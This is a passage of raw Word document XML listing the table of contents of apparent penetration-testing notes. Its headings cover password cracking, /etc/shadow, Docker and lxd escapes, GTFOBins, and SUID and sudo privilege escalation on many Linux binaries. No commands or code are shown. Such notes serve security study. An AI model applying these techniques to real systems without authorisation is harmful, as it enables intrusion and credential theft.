        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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fp2fnkdwx2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Bypassing file extension filters</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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py8vu27jg7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John The Ripper</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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dl5rlby8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1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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h01aga8k1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/etc/passwd and /etc/shadow files</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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g7igz5r9t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Encrypted ZIP Files (ZIP files with passwords)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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937knob1fv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ZIP files using fcrackzip</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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i3ou8gbt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ZIP files using zip2john (from Vaccine HTB):</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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7miwicycep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Cracking PDF files with passwords</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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z1q05a37zj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HashCat and Hashid</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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t1oc37mjz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the mode needed for a hash</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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buy90mcvw0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John the Ripper vs. Hashcat</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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307vitdame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Hashing</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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u0oqky55w3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lxd group</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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p8t9kmi4jm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Docker</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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kptxgmbuou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Root from users in Docker Group</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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tcko022jm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tell if you are currently inside of a Docker container instead of an actual machine and how to escape using ligolo</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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idf4f9xxsn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GTFOBins / Binary (Unix Binaries)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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cwumehmcf3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exploits</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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4qbyfaghz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Apache2 Configuration file (/bin/systemctl * apache2)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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u0qnfqj1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Apache2 (/usr/sbin/apache2)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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j8d46m1xk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teehee (/usr/bin/teehee)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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m4bvkdbrz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hping3 (/usr/bin/hping3)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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ete758z32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SUID bit for /usr/sbin/hping3 is also set:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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jvci0brfvu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 SUID bit for /usr/sbin/hping3 is NOT set:</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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o3hlyd8sco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/sbin/shutdown and /usr/bin/check-system</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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0phz9sd8n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Borg (/usr/bin/borg)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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nqz3wdljgu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/usr/bin/composer</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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oeioe15l8m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/usr/bin/systemctl</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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j5t3pc2hpo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/usr/bin/make</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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kqjfdomoe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/use/bin/flask_password_changer</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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14dqbeyblv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/usr/bin/web-scraper</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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748qesdz6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/usr/bin/rsync</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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mqme7yc5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/bin/systemctl restart spiderbackup.service and /bin/systemctl daemon-reload</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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7xrn0pphd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/usr/bin/mail</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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039p6o4j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/usr/bin/docker</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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llwswxgzxp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/usr/bin/gcore</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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529t39a1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/usr/bin/cpulimit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000011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lw0b5ouox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/usr/bin/ln</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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wi0wf5w0t0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Sudo Token Inject</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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fldleadglq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SUID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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uuh6u7i1p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find SUID files/binaries</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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a3r1sy3bi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 out common SUID binaries</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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wd2ukzce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quickly check if something is in GTFOBins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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cx2eipua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/bin/bash with SUID bit set</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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psvq585ilj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Shared Object Injection</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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7i544g0ip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PATH Environment Variable</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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f08wu3pgnk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Shell Features (#1)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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8h1ybv0rm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Shell Features (#2)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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5idqaetrvi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SUID attacks from GTFOBins</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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zv2kj648o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/usr/bin/find</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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cl6nekgv6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/usr/bin/vim</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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riv14e6b1i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/usr/bin/dosbox</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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wv0t3ggdh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/usr/sbin/start-stop-daemon</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000012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m4tq1mid3a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/usr/bin/php7.4 (but any version works)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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13j33ow90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/usr/bin/wget</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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m5cmte5w87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SUID attacks not in GTFOBins or need more context</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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1dogch7y7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doas (/usr/local/bin/doas)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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753kmj1ud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screen-4.5.0 with SUID bit</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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b73j617mo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exim-4.84-3</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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p68pab8t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aria2c (/usr/bin/aria2c)</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000013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4zm8970gq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/usr/bin/status</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
        <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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qphf8f4p8b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SGID</w:t>
              <w:tab/>
              <w:t xml:space="preserve">1</w:t>
            </w:r>
          </w:hyperlink>
          <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
            <w:rPr>
              <w:rtl w:val="0"/>
            </w:rPr>
          </w:r>
        </w:p>
